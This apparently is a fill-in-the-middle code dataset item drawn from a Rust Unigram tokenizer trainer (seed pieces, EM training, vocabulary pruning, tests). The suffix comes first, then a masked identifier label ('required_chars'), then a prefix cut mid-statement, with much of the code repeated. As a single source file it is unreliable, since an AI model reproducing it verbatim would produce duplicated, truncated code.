let mut inverted: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
for (i, (sentence, count)) in enumerated_sentence_count_chunk {
let mut lattice = Lattice::from(sentence, bos_id, eos_id);
model.populate_nodes(&mut lattice);
vsum += *count as f64;
for node_ref in lattice.viterbi() {
let id = node_ref.borrow().id;
freq[id] += *count as f64;
inverted[id].push(*i);
}
}
(vsum, freq, inverted)
})
.reduce(
|| (0.0, vec![0.0; pieces.len()], vec![Vec::new(); pieces.len()]),
|(vsum, freq, inverted), (lvsum, lfreq, linverted)| {
(
vsum + lvsum,
freq.iter()
.zip(lfreq)
.map(|(global_el, local_el)| global_el + local_el)
.collect(),
inverted
.iter()
.zip(linverted)
.map(|(global_el, local_el)| [&global_el[..], &local_el[..]].concat())
.collect(),
)
},
);
let (vsum, freq, inverted) = collected;
let sum: f64 = freq.iter().sum();
let logsum = sum.ln();
let mut candidates: Vec<(usize, f64)> = vec![];
let mut new_pieces: Vec<SentencePiece> = Vec::with_capacity(self.vocab_size as usize);
new_pieces.push(pieces[0].clone());
// Finally, computes how likely the LM likelihood is reduced if
// the sentencepiece[i] is removed from the vocabulary.
// Since the exact computation of loss is difficult, we compute the
// loss approximately by assuming that all sentencepiece[i] in the sentences
// are replaced with alternatives[i] when sentencepiece[i] is removed.
for (id, (token, score)) in pieces.iter().enumerate() {
if id == 0 {
continue;
}
if freq[id] == 0.0 && !always_keep[id] {
// not found in Viterbi path. Can remove this entry safely.
continue;
} else if alternatives[id].is_empty() {
// no alternatives. Keeps this entry.
new_pieces.push((token.to_string(), *score));
} else {
let mut f = 0.0; // the frequency of pieces[i];
for n in &inverted[id] {
let score = sentences[*n].1 as f64;
f += score;
}
// TODO: Temporary hack to avoid Nans.
if f == 0.0 || f.is_nan() {
// new_pieces.push((token.to_string(), *score));
continue;
}
f /= vsum; // normalizes by all sentence frequency.
let logprob_sp = freq[id].ln() - logsum;
// After removing the sentencepiece[i], its frequency freq[i] is
// re-assigned to alternatives.
// new_sum = current_sum - freq[i] + freq[i] * alternatives.size()
// = current_sum + freq[i] (alternatives - 1)
let logsum_alt = (sum + freq[id] * (alternatives.len() - 1) as f64).ln();
// The frequencies of altenatives are increased by freq[i].
let mut logprob_alt = 0.0;
for n in &alternatives[id] {
logprob_alt += (freq[*n] + freq[id]).ln() - logsum_alt;
}
// loss: the diff of likelihood after removing the sentencepieces[i].
let loss = f * (logprob_sp - logprob_alt);
if loss.is_nan() {
panic!("");
}
candidates.push((id, loss));
}
}
let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
let pruned_size: usize = ((pieces.len() as f64) * self.shrinking_factor) as usize;
let pruned_size = desired_vocab_size.max(pruned_size);
candidates.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
for (id, _score) in candidates {
if new_pieces.len() == pruned_size {
break;
}
new_pieces.push(pieces[id].clone());
}
new_pieces.to_vec()
}
/// Update the progress bar with the new provided length and message
fn update_progress(&self, p: &Option<ProgressBar>, len: usize, message: &str) {
if let Some(p) = p {
p.set_message(message);
p.set_length(len as u64);
p.set_draw_delta(len as u64 / 100);
p.reset();
}
}
/// Set the progress bar in the finish state
fn finalize_progress(&self, p: &Option<ProgressBar>, final_len: usize) {
if let Some(p) = p {
p.set_length(final_len as u64);
p.finish();
println!();
}
}
fn run_e_step(&self, model: &Unigram, sentences: &[Sentence]) -> (f64, u32, Vec<f64>) {
let all_sentence_freq: u32 = sentences.iter().map(|(_a, b)| *b).sum();
let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
let collected: (f64, u32, Vec<f64>) = sentences
.maybe_par_chunks(chunk_size)
.map(|sentences_chunk| {
let mut expected: Vec<f64> = vec![0.0; model.len()];
let mut objs: f64 = 0.0;
let mut ntokens: u32 = 0;
for (string, freq) in sentences_chunk {
let mut lattice = Lattice::from(string, model.bos_id, model.eos_id);
model.populate_nodes(&mut lattice);
let z: f64 = lattice.populate_marginal(*freq as f64, &mut expected);
if z.is_nan() {
panic!("likelihood is NAN. Input sentence may be too long.");
}
ntokens += lattice.viterbi().len() as u32;
objs -= z / (all_sentence_freq as f64);
}
(objs, ntokens, expected)
})
.reduce(
|| (0.0, 0, vec![0.0; model.len()]),
|(objs, ntokens, expected), (lobjs, lntokens, lexpected)| {
(
objs + lobjs,
ntokens + lntokens,
expected
.iter()
.zip(lexpected)
.map(|(global_el, local_el)| global_el + local_el)
.collect(),
)
},
);
collected
}
fn run_m_step(&self, pieces: &[SentencePiece], expected: &[f64]) -> Vec<SentencePiece> {
if pieces.len() != expected.len() {
panic!(
"Those two iterators are supposed to be the same length ({} vs {})",
pieces.len(),
expected.len()
);
}
let mut new_pieces: Vec<SentencePiece> =
Vec::with_capacity(self.vocab_size.try_into().unwrap());
let mut sum = 0.0;
let expected_frequency_threshold = 0.5;
for (i, (freq, (piece, _score))) in expected.iter().zip(pieces).enumerate() {
// Always keep unk.
if i == 0 {
new_pieces.push((piece.clone(), f64::NAN));
continue;
}
if *freq < expected_frequency_threshold {
continue;
}
new_pieces.push((piece.clone(), *freq));
sum += freq;
}
// // Here we do not use the original EM, but use the
// // Bayesianified/DPified EM algorithm.
// // https://cs.stanford.edu/~pliang/papers/tutorial-acl2007-talk.pdf
// // This modification will act as a sparse prior.
let logsum = digamma(sum);
let new_pieces: Vec<_> = new_pieces
.into_iter()
.map(|(s, c)| (s, digamma(c) - logsum))
.collect();
new_pieces
}
pub fn do_train(
&self,
sentences: Vec<Sentence>,
model: &mut Unigram,
) -> Result<Vec<AddedToken>> {
let progress = self.setup_progress();
//
// 1. Compute frequent substrings
// TODO Should be able to upgrade to u64 when needed
self.update_progress(&progress, sentences.len(), "Suffix array seeds");
let mut pieces: Vec<SentencePiece> =
Vec::with_capacity(self.vocab_size.try_into().unwrap());
// We use a UNK token when training, whatever the `self.unk_token`
pieces.push(("<UNK>".into(), f64::NAN));
pieces.extend(self.make_seed_sentence_pieces(&sentences, &progress));
self.finalize_progress(&progress, sentences.len());
// Useful to check compatibility with spm.
debug!(
"Using {} pieces on {} sentences for EM training",
pieces.len(),
sentences.len()
);
let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
// 2. Run E-M Loops to fine grain the pieces.
// We will shrink the vocab by shrinking_factor every loop on average
// Some other pieces are dropped if logprob is too small
// V = N * (f)**k
// k = log(V / N) / log(f)
let expected_loops = (((desired_vocab_size as f64).ln() - (pieces.len() as f64).ln())
/ self.shrinking_factor.ln()) as usize
+ 1;
let expected_updates = expected_loops * self.n_sub_iterations as usize;
self.update_progress(&progress, expected_updates, "EM training");
let required_chars = self.required_chars(&sentences);
if required_chars.len() as u32 > self.vocab_size {
return Err(Box::new(UnigramTrainerError::VocabularyTooSmall));
}
let mut new_model = Unigram::from(pieces.clone(), Some(0), false)?;
loop {
// Sub-EM iteration.
for _iter in 0..self.n_sub_iterations {
// Executes E step
let (_objective, _num_tokens, expected) = self.run_e_step(&new_model, &sentences);
// Executes M step.
pieces = self.run_m_step(&pieces, &expected);
new_model = Unigram::from(pieces.clone(), Some(0), false)?;
// Useful comment for checking compatibility with spm
debug!(
"Em iter={} size={} obj={} num_tokens={} num_tokens/piece={}",
_iter,
new_model.len(),
_objective,
_num_tokens,
_num_tokens as f64 / model.len() as f64
);
if let Some(p) = &progress {
p.inc(1);
}
} // end of Sub EM iteration
// Stops the iteration when the size of sentences reaches to the
// desired symbol size.
if pieces.len() <= desired_vocab_size {
break;
}
// Prunes pieces.
pieces = self.prune_sentence_pieces(&new_model, &pieces, &sentences);
new_model = Unigram::from(pieces.clone(), Some(0), false)?;
}
self.finalize_progress(&progress, expected_updates);
// Finally, adjusts the size of sentencepices to be |vocab_size|.
*model = self.finalize(new_model, required_chars)?;
Ok(self.special_tokens.clone())
}
}
impl Trainer for UnigramTrainer {
type Model = Unigram;
/// Train a Unigram model
fn train(&self, model: &mut Unigram) -> Result<Vec<AddedToken>> {
let sentences: Vec<_> = self.words.iter().map(|(s, i)| (s.to_owned(), *i)).collect();
self.do_train(sentences, model)
}
/// Whether we should show progress
fn should_show_progress(&self) -> bool {
self.show_progress
}
fn feed<I, S, F>(&mut self, iterator: I, process: F) -> Result<()>
where
I: Iterator<Item = S> + Send,
S: AsRef<str> + Send,
F: Fn(&str) -> Result<Vec<String>> + Sync,
{
let words: Result<HashMap<String, u32>> = iterator
.maybe_par_bridge()
.map(|sequence| {
let words = process(sequence.as_ref())?;
let mut map = HashMap::new();
for word in words {
map.entry(word).and_modify(|c| *c += 1).or_insert(1);
}
Ok(map)
})
.reduce(
|| Ok(HashMap::new()),
|acc, ws| {
let mut acc = acc?;
for (k, v) in ws? {
acc.entry(k).and_modify(|c| *c += v).or_insert(v);
}
Ok(acc)
},
);
self.words = words?;
Ok(())
}
}
#[cfg(test)]
mod tests {
use super::*;
use assert_approx_eq::assert_approx_eq;
use std::iter::FromIterator;
#[test]
fn test_unigram_chars() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.build()
.unwrap();
let sentences = vec![
("This is a".to_string(), 1),
("こんにちは友達".to_string(), 1),
];
let required_chars = trainer.required_chars(&sentences);
assert_eq!(required_chars.len(), 13);
let progress = None;
let table = trainer.make_seed_sentence_pieces(&sentences, &progress);
let target_strings = vec![
"s", "i", " ", "達", "友", "ん", "は", "に", "ち", "こ", "h", "a", "T", "is ", "s ",
];
let strings: Vec<_> = table.iter().map(|(string, _)| string).collect();
assert_eq!(strings, target_strings);
let scores = table.iter().map(|(_, score)| score);
let target_scores = vec![
-2.5649493574615367, // 2.0
-2.5649493574615367, // 2.0
-2.5649493574615367, // 2.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-1.4663370687934272, // 6.0
-1.8718021769015916, // 4.0
];
for (score, target_score) in scores.zip(target_scores) {
assert_approx_eq!(*score, target_score, 0.01);
}
}
#[test]
fn test_initial_alphabet() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.initial_alphabet(HashSet::from_iter(vec!['a', 'b', 'c', 'd', 'e', 'f']))
.build()
.unwrap();
let sentences = vec![("こんにちは友達".to_string(), 1)];
let required_chars = trainer.required_chars(&sentences);
assert_eq!(
required_chars,
vec!["こ", "ん", "に", "ち", "は", "友", "達", "a", "b", "c", "d", "e", "f"]
.into_iter()
.map(|s| s.to_owned())
.collect::<HashSet<_>>()
);
}
#[test]
fn test_unk_token() {
// 1. Should add `unk_token` as first special token
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
])
.unk_token(Some("[UNK]".into()))
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
// 2. Let it where it is
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
AddedToken::from("[UNK]", true),
])
.unk_token(Some("[UNK]".into()))
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
// 3. Don't put it there if not needed
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next().unwrap().0, "e".to_string());
}
#[test]
fn test_special_tokens() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
])
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
}
#[test]
fn test_to_log_prob() {
let mut a = vec![("".to_string(), 1.0), ("".to_string(), 2.0)];
to_log_prob(&mut a);
let scores = a.iter().map(|(_, score)| *score).collect::<Vec<_>>();
// ln(1) - ln(3)
assert_approx_eq!(scores[0], -1.098, 0.01);
// ln(2) - ln(3)
assert_approx_eq!(scores[1], -0.405, 0.01);
}
}
| required_chars | identifier_name |
trainer.rs | use crate::models::unigram::{lattice::Lattice, model::Unigram};
use crate::tokenizer::{AddedToken, Result, Trainer};
use crate::utils::parallelism::*;
use crate::utils::progress::{ProgressBar, ProgressStyle};
use log::debug;
use serde::{Deserialize, Serialize};
use std::cmp::Reverse;
use std::collections::{HashMap, HashSet};
use std::convert::TryInto;
// A token and a score
type SentencePiece = (String, f64);
// A full sentence or word + it's count within the dataset
type Sentence = (String, u32);
fn digamma(mut x: f64) -> f64 {
let mut result = 0.0;
while x < 7.0 {
result -= 1.0 / x;
x += 1.0;
}
x -= 1.0 / 2.0;
let xx = 1.0 / x;
let xx2 = xx * xx;
let xx4 = xx2 * xx2;
result += x.ln() + (1.0 / 24.0) * xx2 - 7.0 / 960.0 * xx4 + (31.0 / 8064.0) * xx4 * xx2
- (127.0 / 30720.0) * xx4 * xx4;
result
}
#[derive(thiserror::Error, Debug)]
pub enum UnigramTrainerError {
#[error("The vocabulary is not large enough to contain all chars")]
VocabularyTooSmall,
}
fn to_log_prob(pieces: &mut [SentencePiece]) {
let sum: f64 = pieces.iter().map(|(_, score)| score).sum();
let logsum = sum.ln();
for (_, score) in pieces.iter_mut() {
*score = score.ln() - logsum;
}
}
/// A `UnigramTrainer` can train a `Unigram` model from `word_counts`.
#[non_exhaustive]
#[derive(Builder, Debug, Clone, Serialize, Deserialize)]
pub struct UnigramTrainer {
#[builder(default = "true")]
pub show_progress: bool,
#[builder(default = "8000")]
pub vocab_size: u32,
#[builder(default = "2")]
pub n_sub_iterations: u32,
#[builder(default = "0.75")]
pub shrinking_factor: f64,
#[builder(default = "vec![]")]
pub special_tokens: Vec<AddedToken>,
#[builder(default = "HashSet::new()")]
pub initial_alphabet: HashSet<char>,
#[builder(default = "None")]
pub unk_token: Option<String>,
#[builder(default = "16")]
pub max_piece_length: usize,
#[builder(default = "1_000_000")]
seed_size: usize,
#[builder(default = "HashMap::new()")]
words: HashMap<String, u32>,
}
impl Default for UnigramTrainer {
fn default() -> Self {
Self::builder().build().unwrap()
}
}
impl UnigramTrainer {
pub fn builder() -> UnigramTrainerBuilder {
UnigramTrainerBuilder::default()
}
/// Setup a progress bar if asked to show progress
fn setup_progress(&self) -> Option<ProgressBar> {
if self.show_progress {
let p = ProgressBar::new(0);
p.set_style(
ProgressStyle::default_bar()
.template("[{elapsed_precise}] {msg:<40!} {wide_bar} {pos:<9!}/{len:>9!}"),
);
Some(p)
} else {
None
}
}
fn is_valid_sentencepiece(&self, char_string: &[char]) -> bool {
// Checks string length
// Space not in the substring, numbers, hiragana and more should be taken
// care of within pre_tokenizers.
// https://github.com/google/sentencepiece/blob/26be9516cd81d5315ee31c48d2438018e0eab879/src/trainer_interface.cc#L203
let n = char_string.len();
if char_string.is_empty() || n > self.max_piece_length {
return false;
}
true
}
fn finalize(&self, model: Unigram, required_chars: HashSet<String>) -> Result<Unigram> {
let mut min_score_penalty = 0.0;
let min_score_penalty_delta = 0.0001;
let mut pieces: Vec<(String, f64)> = vec![];
let mut inserted: HashSet<String> = HashSet::new();
// We don't want to include the <UNK> that was used to train
inserted.insert("<UNK>".into());
let existing_pieces: HashMap<String, f64> = model.iter().cloned().collect();
for c in required_chars {
if let Some(t) = existing_pieces.get(&c) {
inserted.insert(c.clone());
pieces.push((c, *t));
} else {
let score = model.min_score + min_score_penalty;
inserted.insert(c.clone());
pieces.push((c, score));
min_score_penalty += min_score_penalty_delta;
}
}
let (unk_id, need_add_unk) = if let Some(ref unk) = self.unk_token {
let unk_id = self.special_tokens.iter().enumerate().find_map(|(i, t)| {
if t.content == *unk {
Some(i)
} else {
None
}
});
match unk_id {
Some(id) => (Some(id), false),
None => (Some(0), true),
}
} else {
(None, false)
};
let vocab_size_without_special_tokens = if need_add_unk {
self.vocab_size as usize - self.special_tokens.len() - 1
} else {
self.vocab_size as usize - self.special_tokens.len()
};
for (token, score) in model.iter() {
if inserted.contains::<str>(token) {
continue;
}
inserted.insert(token.to_string());
pieces.push((token.to_string(), if score.is_nan() { 0.0 } else { *score }));
if pieces.len() == vocab_size_without_special_tokens {
break;
}
}
pieces.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
// Insert the necessary tokens
let mut special_tokens = self
.special_tokens
.iter()
.map(|t| (t.content.clone(), 0.0))
.collect::<Vec<_>>();
if need_add_unk {
special_tokens.insert(0, (self.unk_token.clone().unwrap(), 0.0));
}
Unigram::from(
special_tokens.into_iter().chain(pieces).collect(),
unk_id,
model.byte_fallback(),
)
}
fn required_chars(&self, word_counts: &[Sentence]) -> HashSet<String> {
word_counts
.iter()
.flat_map(|(s, _count)| s.chars())
.chain(self.initial_alphabet.iter().copied())
.map(|c| c.to_string())
.collect()
}
fn make_seed_sentence_pieces(
&self,
sentences: &[Sentence],
_progress: &Option<ProgressBar>,
) -> Vec<SentencePiece> {
// Put all sentences in a string, separated by \0
let total: usize = sentences
.iter()
.map(|(s, _)| s.chars().count())
.sum::<usize>()
+ sentences.len();
let mut flat_string = String::with_capacity(total);
let mut all_chars: HashMap<char, u32> = HashMap::new();
let c_sentence_boundary = '\0';
let k_sentence_boundary = '\0'.to_string();
for (string, n) in sentences {
if string.is_empty() {
continue;
}
flat_string.push_str(string);
// XXX
// Comment suggests we add sentence boundary, but it seems to be missing from actual
// code in spm.
flat_string.push_str(&k_sentence_boundary);
for c in string.chars() {
if c != c_sentence_boundary {
*all_chars.entry(c).or_insert(0) += n;
}
}
}
flat_string.shrink_to_fit();
#[cfg(feature = "esaxx_fast")]
let suffix = esaxx_rs::suffix(&flat_string).unwrap();
#[cfg(not(feature = "esaxx_fast"))]
let suffix = esaxx_rs::suffix_rs(&flat_string).unwrap();
// Basic chars need to be in sentence pieces.
let mut seed_sentencepieces: Vec<SentencePiece> = vec![];
let mut sall_chars: Vec<_> = all_chars.into_iter().map(|(a, b)| (b, a)).collect();
// Reversed order
sall_chars.sort_by_key(|&a| Reverse(a));
let mut substr_index: Vec<_> = suffix
.iter()
.filter_map(|(string, freq)| {
if string.len() <= 1 {
return None;
}
if string.contains(&c_sentence_boundary) {
return None;
}
if !self.is_valid_sentencepiece(string) {
return None;
}
let score = freq * string.len() as u32;
// if let Some(p) = &progress {
// p.inc(1);
// }
Some((score, string))
})
.collect();
// Fill seed_sentencepieces
for (count, character) in sall_chars {
seed_sentencepieces.push((character.to_string(), count.into()));
}
// sort by decreasing score
substr_index.sort_by_key(|&a| Reverse(a));
for (score, char_string) in substr_index {
// Just in case
assert!(self.is_valid_sentencepiece(char_string));
let string: String = char_string.iter().collect();
seed_sentencepieces.push((string, score.into()));
if seed_sentencepieces.len() >= self.seed_size {
break;
}
}
to_log_prob(&mut seed_sentencepieces);
seed_sentencepieces
}
fn prune_sentence_pieces(
&self,
model: &Unigram,
pieces: &[SentencePiece],
sentences: &[Sentence],
) -> Vec<SentencePiece> {
let mut always_keep = vec![true; pieces.len()];
let mut alternatives: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
let bos_id = pieces.len() + 1;
let eos_id = pieces.len() + 2;
// First, segments the current sentencepieces to know
// how each sentencepiece is resegmented if this sentencepiece is removed
// from the vocabulary.
// To do so, we take the second best segmentation of sentencepiece[i].
// alternatives[i] stores the sequence of second best sentencepieces.
for (id, (token, _score)) in pieces.iter().enumerate() {
// Always keep unk.
if id == 0 {
always_keep[id] = false;
continue;
}
let mut lattice = Lattice::from(token, bos_id, eos_id);
model.populate_nodes(&mut lattice);
let nbests = lattice.nbest(2);
if nbests.len() == 1 {
always_keep[id] = true;
} else if nbests[0].len() >= 2 {
always_keep[id] = false;
} else if nbests[0].len() == 1 {
always_keep[id] = true;
for node in &nbests[1] {
let alt_id = node.borrow().id;
alternatives[id].push(alt_id);
}
}
}
// Second, segments all sentences to compute likelihood
// with a unigram language model. inverted[i] stores
// the set of sentence index where the sentencepieces[i] appears.
let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
let indexed_sentences: Vec<(usize, &Sentence)> = sentences.iter().enumerate().collect();
let collected: (f64, Vec<f64>, Vec<Vec<usize>>) = indexed_sentences
.maybe_par_chunks(chunk_size)
.map(|enumerated_sentence_count_chunk| {
let mut vsum = 0.0;
let mut freq: Vec<f64> = vec![0.0; pieces.len()];
let mut inverted: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
for (i, (sentence, count)) in enumerated_sentence_count_chunk {
let mut lattice = Lattice::from(sentence, bos_id, eos_id);
model.populate_nodes(&mut lattice);
vsum += *count as f64;
for node_ref in lattice.viterbi() {
let id = node_ref.borrow().id;
freq[id] += *count as f64;
inverted[id].push(*i);
}
}
(vsum, freq, inverted)
})
.reduce(
|| (0.0, vec![0.0; pieces.len()], vec![Vec::new(); pieces.len()]),
|(vsum, freq, inverted), (lvsum, lfreq, linverted)| {
(
vsum + lvsum,
freq.iter()
.zip(lfreq)
.map(|(global_el, local_el)| global_el + local_el)
.collect(),
inverted
.iter()
.zip(linverted)
.map(|(global_el, local_el)| [&global_el[..], &local_el[..]].concat())
.collect(),
)
},
);
let (vsum, freq, inverted) = collected;
let sum: f64 = freq.iter().sum();
let logsum = sum.ln();
let mut candidates: Vec<(usize, f64)> = vec![];
let mut new_pieces: Vec<SentencePiece> = Vec::with_capacity(self.vocab_size as usize);
new_pieces.push(pieces[0].clone());
// Finally, computes how likely the LM likelihood is reduced if
// the sentencepiece[i] is removed from the vocabulary.
// Since the exact computation of loss is difficult, we compute the
// loss approximately by assuming that all sentencepiece[i] in the sentences
// are replaced with alternatives[i] when sentencepiece[i] is removed.
for (id, (token, score)) in pieces.iter().enumerate() {
if id == 0 {
continue;
}
if freq[id] == 0.0 && !always_keep[id] {
// not found in Viterbi path. Can remove this entry safely.
continue;
} else if alternatives[id].is_empty() {
// no alternatives. Keeps this entry.
new_pieces.push((token.to_string(), *score));
} else {
let mut f = 0.0; // the frequency of pieces[i];
for n in &inverted[id] {
let score = sentences[*n].1 as f64;
f += score;
}
// TODO: Temporary hack to avoid Nans.
if f == 0.0 || f.is_nan() |
f /= vsum; // normalizes by all sentence frequency.
let logprob_sp = freq[id].ln() - logsum;
// After removing the sentencepiece[i], its frequency freq[i] is
// re-assigned to alternatives.
// new_sum = current_sum - freq[i] + freq[i] * alternatives.size()
// = current_sum + freq[i] (alternatives - 1)
let logsum_alt = (sum + freq[id] * (alternatives.len() - 1) as f64).ln();
// The frequencies of altenatives are increased by freq[i].
let mut logprob_alt = 0.0;
for n in &alternatives[id] {
logprob_alt += (freq[*n] + freq[id]).ln() - logsum_alt;
}
// loss: the diff of likelihood after removing the sentencepieces[i].
let loss = f * (logprob_sp - logprob_alt);
if loss.is_nan() {
panic!("");
}
candidates.push((id, loss));
}
}
let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
let pruned_size: usize = ((pieces.len() as f64) * self.shrinking_factor) as usize;
let pruned_size = desired_vocab_size.max(pruned_size);
candidates.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
for (id, _score) in candidates {
if new_pieces.len() == pruned_size {
break;
}
new_pieces.push(pieces[id].clone());
}
new_pieces.to_vec()
}
/// Update the progress bar with the new provided length and message
fn update_progress(&self, p: &Option<ProgressBar>, len: usize, message: &str) {
if let Some(p) = p {
p.set_message(message);
p.set_length(len as u64);
p.set_draw_delta(len as u64 / 100);
p.reset();
}
}
/// Set the progress bar in the finish state
fn finalize_progress(&self, p: &Option<ProgressBar>, final_len: usize) {
if let Some(p) = p {
p.set_length(final_len as u64);
p.finish();
println!();
}
}
fn run_e_step(&self, model: &Unigram, sentences: &[Sentence]) -> (f64, u32, Vec<f64>) {
let all_sentence_freq: u32 = sentences.iter().map(|(_a, b)| *b).sum();
let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
let collected: (f64, u32, Vec<f64>) = sentences
.maybe_par_chunks(chunk_size)
.map(|sentences_chunk| {
let mut expected: Vec<f64> = vec![0.0; model.len()];
let mut objs: f64 = 0.0;
let mut ntokens: u32 = 0;
for (string, freq) in sentences_chunk {
let mut lattice = Lattice::from(string, model.bos_id, model.eos_id);
model.populate_nodes(&mut lattice);
let z: f64 = lattice.populate_marginal(*freq as f64, &mut expected);
if z.is_nan() {
panic!("likelihood is NAN. Input sentence may be too long.");
}
ntokens += lattice.viterbi().len() as u32;
objs -= z / (all_sentence_freq as f64);
}
(objs, ntokens, expected)
})
.reduce(
|| (0.0, 0, vec![0.0; model.len()]),
|(objs, ntokens, expected), (lobjs, lntokens, lexpected)| {
(
objs + lobjs,
ntokens + lntokens,
expected
.iter()
.zip(lexpected)
.map(|(global_el, local_el)| global_el + local_el)
.collect(),
)
},
);
collected
}
fn run_m_step(&self, pieces: &[SentencePiece], expected: &[f64]) -> Vec<SentencePiece> {
if pieces.len() != expected.len() {
panic!(
"Those two iterators are supposed to be the same length ({} vs {})",
pieces.len(),
expected.len()
);
}
let mut new_pieces: Vec<SentencePiece> =
Vec::with_capacity(self.vocab_size.try_into().unwrap());
let mut sum = 0.0;
let expected_frequency_threshold = 0.5;
for (i, (freq, (piece, _score))) in expected.iter().zip(pieces).enumerate() {
// Always keep unk.
if i == 0 {
new_pieces.push((piece.clone(), f64::NAN));
continue;
}
if *freq < expected_frequency_threshold {
continue;
}
new_pieces.push((piece.clone(), *freq));
sum += freq;
}
// // Here we do not use the original EM, but use the
// // Bayesianified/DPified EM algorithm.
// // https://cs.stanford.edu/~pliang/papers/tutorial-acl2007-talk.pdf
// // This modification will act as a sparse prior.
let logsum = digamma(sum);
let new_pieces: Vec<_> = new_pieces
.into_iter()
.map(|(s, c)| (s, digamma(c) - logsum))
.collect();
new_pieces
}
pub fn do_train(
&self,
sentences: Vec<Sentence>,
model: &mut Unigram,
) -> Result<Vec<AddedToken>> {
let progress = self.setup_progress();
//
// 1. Compute frequent substrings
// TODO Should be able to upgrade to u64 when needed
self.update_progress(&progress, sentences.len(), "Suffix array seeds");
let mut pieces: Vec<SentencePiece> =
Vec::with_capacity(self.vocab_size.try_into().unwrap());
// We use a UNK token when training, whatever the `self.unk_token`
pieces.push(("<UNK>".into(), f64::NAN));
pieces.extend(self.make_seed_sentence_pieces(&sentences, &progress));
self.finalize_progress(&progress, sentences.len());
// Useful to check compatibility with spm.
debug!(
"Using {} pieces on {} sentences for EM training",
pieces.len(),
sentences.len()
);
let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
// 2. Run E-M Loops to fine grain the pieces.
// We will shrink the vocab by shrinking_factor every loop on average
// Some other pieces are dropped if logprob is too small
// V = N * (f)**k
// k = log(V / N) / log(f)
let expected_loops = (((desired_vocab_size as f64).ln() - (pieces.len() as f64).ln())
/ self.shrinking_factor.ln()) as usize
+ 1;
let expected_updates = expected_loops * self.n_sub_iterations as usize;
self.update_progress(&progress, expected_updates, "EM training");
let required_chars = self.required_chars(&sentences);
if required_chars.len() as u32 > self.vocab_size {
return Err(Box::new(UnigramTrainerError::VocabularyTooSmall));
}
let mut new_model = Unigram::from(pieces.clone(), Some(0), false)?;
loop {
// Sub-EM iteration.
for _iter in 0..self.n_sub_iterations {
// Executes E step
let (_objective, _num_tokens, expected) = self.run_e_step(&new_model, &sentences);
// Executes M step.
pieces = self.run_m_step(&pieces, &expected);
new_model = Unigram::from(pieces.clone(), Some(0), false)?;
// Useful comment for checking compatibility with spm
debug!(
"Em iter={} size={} obj={} num_tokens={} num_tokens/piece={}",
_iter,
new_model.len(),
_objective,
_num_tokens,
_num_tokens as f64 / model.len() as f64
);
if let Some(p) = &progress {
p.inc(1);
}
} // end of Sub EM iteration
// Stops the iteration when the size of sentences reaches to the
// desired symbol size.
if pieces.len() <= desired_vocab_size {
break;
}
// Prunes pieces.
pieces = self.prune_sentence_pieces(&new_model, &pieces, &sentences);
new_model = Unigram::from(pieces.clone(), Some(0), false)?;
}
self.finalize_progress(&progress, expected_updates);
// Finally, adjusts the size of sentencepices to be |vocab_size|.
*model = self.finalize(new_model, required_chars)?;
Ok(self.special_tokens.clone())
}
}
impl Trainer for UnigramTrainer {
type Model = Unigram;
/// Train a Unigram model
fn train(&self, model: &mut Unigram) -> Result<Vec<AddedToken>> {
let sentences: Vec<_> = self.words.iter().map(|(s, i)| (s.to_owned(), *i)).collect();
self.do_train(sentences, model)
}
/// Whether we should show progress
fn should_show_progress(&self) -> bool {
self.show_progress
}
fn feed<I, S, F>(&mut self, iterator: I, process: F) -> Result<()>
where
I: Iterator<Item = S> + Send,
S: AsRef<str> + Send,
F: Fn(&str) -> Result<Vec<String>> + Sync,
{
let words: Result<HashMap<String, u32>> = iterator
.maybe_par_bridge()
.map(|sequence| {
let words = process(sequence.as_ref())?;
